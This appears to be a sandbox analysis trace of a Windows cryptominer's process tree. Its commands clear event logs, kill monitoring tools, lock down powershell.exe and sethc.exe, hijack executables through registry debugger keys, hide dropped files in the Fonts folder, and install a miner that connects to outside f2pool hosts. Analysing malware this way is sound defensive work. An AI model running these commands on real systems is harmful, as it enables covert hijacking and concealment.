C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share admin$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share c$ /delete3⤵
-
C:\Windows\SysWOW64\net.exenet share d$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share d$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share e$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share e$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share f$ /delete3⤵
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y4⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Graphipcs_PerfSvcs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Graphipcs_PerfSvcs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop conhost3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete conhost3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\conhost.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\conhost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Aliyun3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsars.exe /im lsacs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im sqlservr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\sqlservr.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\sqlservr.exe /d everyone3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\csrss.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\csrss.exe /d everyone3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\lsass.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\lsass.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "windows powershell"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "security"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "system"3⤵
- Clears Windows event logs
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
